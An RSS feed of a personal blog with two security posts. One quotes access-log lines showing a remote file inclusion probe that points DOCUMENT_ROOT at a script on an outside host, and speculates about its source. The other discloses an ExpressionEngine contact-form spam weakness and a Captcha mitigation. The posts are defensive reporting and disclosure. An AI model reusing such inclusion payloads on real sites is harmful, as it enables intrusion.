<?xml version="1.0" encoding="UTF-8"?> <rss
version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
> <channel><title>Autarchy of the Private Cave &#187; vulnerability</title> <atom:link href="https://bogdan.org.ua/tags/vulnerability/feed" rel="self" type="application/rss+xml" /><link>https://bogdan.org.ua</link> <description>Tiny bits of bioinformatics, [web-]programming etc</description> <lastBuildDate>Wed, 28 Dec 2022 16:09:04 +0000</lastBuildDate> <language>en-US</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>https://wordpress.org/?v=3.8.27</generator> <item><title>Yandex probing for vulnerabilities in .UA domains?</title><link>https://bogdan.org.ua/2016/04/11/yandex-probing-for-vulnerabilities-in-ua-domains.html</link> <comments>https://bogdan.org.ua/2016/04/11/yandex-probing-for-vulnerabilities-in-ua-domains.html#comments</comments> <pubDate>Mon, 11 Apr 2016 17:11:45 +0000</pubDate> <dc:creator><![CDATA[Bogdan]]></dc:creator> <category><![CDATA[Misc]]></category> <category><![CDATA[Web]]></category> <category><![CDATA[malicious]]></category> <category><![CDATA[scanning]]></category> <category><![CDATA[vulnerability]]></category> <category><![CDATA[Yandex]]></category> <guid
isPermaLink="false">http://bogdan.org.ua/?p=2393</guid> <description><![CDATA[Here is a recent entry from my web-server&#8217;s access log: bogdan.org.ua:80 130.193.51.57 &#8211; - [09/Apr/2016:15:53:22 +0300] &#8220;GET /categories/programming?_SERVER[DOCUMENT_ROOT]=http://www.daedongfur.co.kr/shop/log/.logs/id1.txt HTTP/1.1&#8243; 200 13158 &#8220;-&#8221; &#8220;Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&#8221; Client&#8217;s IP 130.193.51.57 does belong to Yandex network range. So&#8230; Had Yandex started looking for vulnerabilities in the web-sites it scans? Does it only look for vulnerabilities in the [&#8230;]]]></description> <content:encoded><![CDATA[<p>Here is a recent entry from my web-server&#8217;s access log:</p><blockquote><p> bogdan.org.ua:80 130.193.51.57 &#8211; - [09/Apr/2016:15:53:22 +0300] &#8220;GET /categories/programming?_SERVER[DOCUMENT_ROOT]=http://www.daedongfur.co.kr/shop/log/.logs/id1.txt HTTP/1.1&#8243; 200 13158 &#8220;-&#8221; &#8220;Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&#8221;</p></blockquote><p>Client&#8217;s IP 130.193.51.57 does belong to Yandex network range.</p><p>So&#8230;</p><ul><li>Had Yandex started looking for vulnerabilities in the web-sites it scans?</li><li>Does it only look for vulnerabilities in the .UA web-sites/domains?</li><li>Does Yandex really use a Korean web-site to host malicious code?</li></ul><p>In fact, there are more entries like that one, also from one of Yandex IPs:</p><blockquote><p> bogdan.org.ua:80 130.193.51.25 &#8211; - [04/Apr/2016:00:14:22 +0300] &#8220;GET /categories/programming/page/5?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fwww.daedongfur.co.kr%2Fshop%2Flog%2F.logs%2Fid1.txt HTTP/1.1&#8243; 200 12607 &#8220;-&#8221; &#8220;Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&#8221;<br
/> bogdan.org.ua:80 130.193.51.25 &#8211; - [04/Apr/2016:00:19:31 +0300] &#8220;GET /categories/programming/page/4?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fwww.daedongfur.co.kr%2Fshop%2Flog%2F.logs%2Fid1.txt HTTP/1.1&#8243; 200 12174 &#8220;-&#8221; &#8220;Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&#8221;</p></blockquote><p>I can see 3 explanations, and all of them are bad for Yandex:</p><ul><li>Yandex now belongs to KGB, and it does scan [.UA] web-sites for vulnerabilities;</li><li>some/many of Yandex crawler servers are compromised, and are used by malicious 3rd parties;</li><li>there was a public malicious link somewhere (???) to my blog, and Yandex blindly followed it.</li></ul><p><a
class="a2a_button_citeulike" href="https://www.addtoany.com/add_to/citeulike?linkurl=https%3A%2F%2Fbogdan.org.ua%2F2016%2F04%2F11%2Fyandex-probing-for-vulnerabilities-in-ua-domains.html&amp;linkname=Yandex%20probing%20for%20vulnerabilities%20in%20.UA%20domains%3F" title="CiteULike" rel="nofollow noopener" target="_blank"></a><a
class="a2a_button_pocket" href="https://www.addtoany.com/add_to/pocket?linkurl=https%3A%2F%2Fbogdan.org.ua%2F2016%2F04%2F11%2Fyandex-probing-for-vulnerabilities-in-ua-domains.html&amp;linkname=Yandex%20probing%20for%20vulnerabilities%20in%20.UA%20domains%3F" title="Pocket" rel="nofollow noopener" target="_blank"></a><a
class="a2a_button_kindle_it" href="https://www.addtoany.com/add_to/kindle_it?linkurl=https%3A%2F%2Fbogdan.org.ua%2F2016%2F04%2F11%2Fyandex-probing-for-vulnerabilities-in-ua-domains.html&amp;linkname=Yandex%20probing%20for%20vulnerabilities%20in%20.UA%20domains%3F" title="Kindle It" rel="nofollow noopener" target="_blank"></a><a
class="a2a_button_evernote" href="https://www.addtoany.com/add_to/evernote?linkurl=https%3A%2F%2Fbogdan.org.ua%2F2016%2F04%2F11%2Fyandex-probing-for-vulnerabilities-in-ua-domains.html&amp;linkname=Yandex%20probing%20for%20vulnerabilities%20in%20.UA%20domains%3F" title="Evernote" rel="nofollow noopener" target="_blank"></a><a
class="a2a_button_pinterest" href="https://www.addtoany.com/add_to/pinterest?linkurl=https%3A%2F%2Fbogdan.org.ua%2F2016%2F04%2F11%2Fyandex-probing-for-vulnerabilities-in-ua-domains.html&amp;linkname=Yandex%20probing%20for%20vulnerabilities%20in%20.UA%20domains%3F" title="Pinterest" rel="nofollow noopener" target="_blank"></a><a
class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Fbogdan.org.ua%2F2016%2F04%2F11%2Fyandex-probing-for-vulnerabilities-in-ua-domains.html&#038;title=Yandex%20probing%20for%20vulnerabilities%20in%20.UA%20domains%3F" data-a2a-url="https://bogdan.org.ua/2016/04/11/yandex-probing-for-vulnerabilities-in-ua-domains.html" data-a2a-title="Yandex probing for vulnerabilities in .UA domains?"><img
src="https://static.addtoany.com/buttons/share_save_120_16.png" alt="Share"></a></p>]]></content:encoded> <wfw:commentRss>https://bogdan.org.ua/2016/04/11/yandex-probing-for-vulnerabilities-in-ua-domains.html/feed</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>ExpressionEngine contact form (email module) spam vulnerability</title><link>https://bogdan.org.ua/2009/01/26/expressionengine-contact-form-email-module-spam-vulnerability.html</link> <comments>https://bogdan.org.ua/2009/01/26/expressionengine-contact-form-email-module-spam-vulnerability.html#comments</comments> <pubDate>Mon, 26 Jan 2009 09:50:05 +0000</pubDate> <dc:creator><![CDATA[Bogdan]]></dc:creator> <category><![CDATA[CMS]]></category> <category><![CDATA[PHP]]></category> <category><![CDATA[Programming]]></category> <category><![CDATA[Software]]></category> <category><![CDATA[Web]]></category> <category><![CDATA[EE]]></category> <category><![CDATA[ExpressionEngine]]></category> <category><![CDATA[spam]]></category> <category><![CDATA[vulnerability]]></category> <guid
isPermaLink="false">http://bogdan.org.ua/?p=575</guid> <description><![CDATA[Yesterday I had a look at mod.email.php &#8211; the Email module of ExpressionEngine CMS. It appears that it is very easy to use ExpressionEngine&#8217;s contact form (which uses Email module) to send emails to arbitrary addresses &#8211; simply put, send spam using someone&#8217;s EE. And here&#8217;s why: recipients hidden field is passed to the client; [&#8230;]]]></description> <content:encoded><![CDATA[<p>Yesterday I had a look at mod.email.php &#8211; the Email module of ExpressionEngine CMS.</p><p>It appears that it is very easy to use ExpressionEngine&#8217;s contact form (which uses Email module) to send emails to arbitrary addresses &#8211; simply put, send spam using someone&#8217;s EE.</p><p>And here&#8217;s why:</p><ul><li><em>recipients</em> hidden field is passed to the client; it is encrypted, but with access to the mod.email.php code, it is a matter of several minutes to write your own email-encoding function which will produce a completely valid <em>recipients</em> field</li><li>there&#8217;s also <em>XID</em> field, which seems to be unique for each page load</li></ul><p>Spamming algorithm is clear, so I won&#8217;t elaborate. (I could have missed some session variables, though &#8211; didn&#8217;t check them.)</p><p>This information is valid as of ExpressionEngine 1.6.6, but nothing in the change-logs indicates that this mechanism was modified in the newer versions of EE.</p><p><ins
datetime="2009-01-26T13:12:42+00:00">Update:</ins> I&#8217;ve tested, and this vulnerability does exist. The simplest prevention measure is to enable Captcha for Contact Form.</p><p>I&#8217;ve <a
href="http://expressionengine.com/archived_forums/viewthread/103537/" class="broken_link" rel="nofollow">notified</a> the developers.</p><p><a
class="a2a_button_citeulike" href="https://www.addtoany.com/add_to/citeulike?linkurl=https%3A%2F%2Fbogdan.org.ua%2F2009%2F01%2F26%2Fexpressionengine-contact-form-email-module-spam-vulnerability.html&amp;linkname=ExpressionEngine%20contact%20form%20%28email%20module%29%20spam%20vulnerability" title="CiteULike" rel="nofollow noopener" target="_blank"></a><a
class="a2a_button_pocket" href="https://www.addtoany.com/add_to/pocket?linkurl=https%3A%2F%2Fbogdan.org.ua%2F2009%2F01%2F26%2Fexpressionengine-contact-form-email-module-spam-vulnerability.html&amp;linkname=ExpressionEngine%20contact%20form%20%28email%20module%29%20spam%20vulnerability" title="Pocket" rel="nofollow noopener" target="_blank"></a><a
class="a2a_button_kindle_it" href="https://www.addtoany.com/add_to/kindle_it?linkurl=https%3A%2F%2Fbogdan.org.ua%2F2009%2F01%2F26%2Fexpressionengine-contact-form-email-module-spam-vulnerability.html&amp;linkname=ExpressionEngine%20contact%20form%20%28email%20module%29%20spam%20vulnerability" title="Kindle It" rel="nofollow noopener" target="_blank"></a><a
class="a2a_button_evernote" href="https://www.addtoany.com/add_to/evernote?linkurl=https%3A%2F%2Fbogdan.org.ua%2F2009%2F01%2F26%2Fexpressionengine-contact-form-email-module-spam-vulnerability.html&amp;linkname=ExpressionEngine%20contact%20form%20%28email%20module%29%20spam%20vulnerability" title="Evernote" rel="nofollow noopener" target="_blank"></a><a
class="a2a_button_pinterest" href="https://www.addtoany.com/add_to/pinterest?linkurl=https%3A%2F%2Fbogdan.org.ua%2F2009%2F01%2F26%2Fexpressionengine-contact-form-email-module-spam-vulnerability.html&amp;linkname=ExpressionEngine%20contact%20form%20%28email%20module%29%20spam%20vulnerability" title="Pinterest" rel="nofollow noopener" target="_blank"></a><a
class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Fbogdan.org.ua%2F2009%2F01%2F26%2Fexpressionengine-contact-form-email-module-spam-vulnerability.html&#038;title=ExpressionEngine%20contact%20form%20%28email%20module%29%20spam%20vulnerability" data-a2a-url="https://bogdan.org.ua/2009/01/26/expressionengine-contact-form-email-module-spam-vulnerability.html" data-a2a-title="ExpressionEngine contact form (email module) spam vulnerability"><img
src="https://static.addtoany.com/buttons/share_save_120_16.png" alt="Share"></a></p>]]></content:encoded> <wfw:commentRss>https://bogdan.org.ua/2009/01/26/expressionengine-contact-form-email-module-spam-vulnerability.html/feed</wfw:commentRss> <slash:comments>1</slash:comments> </item> </channel> </rss>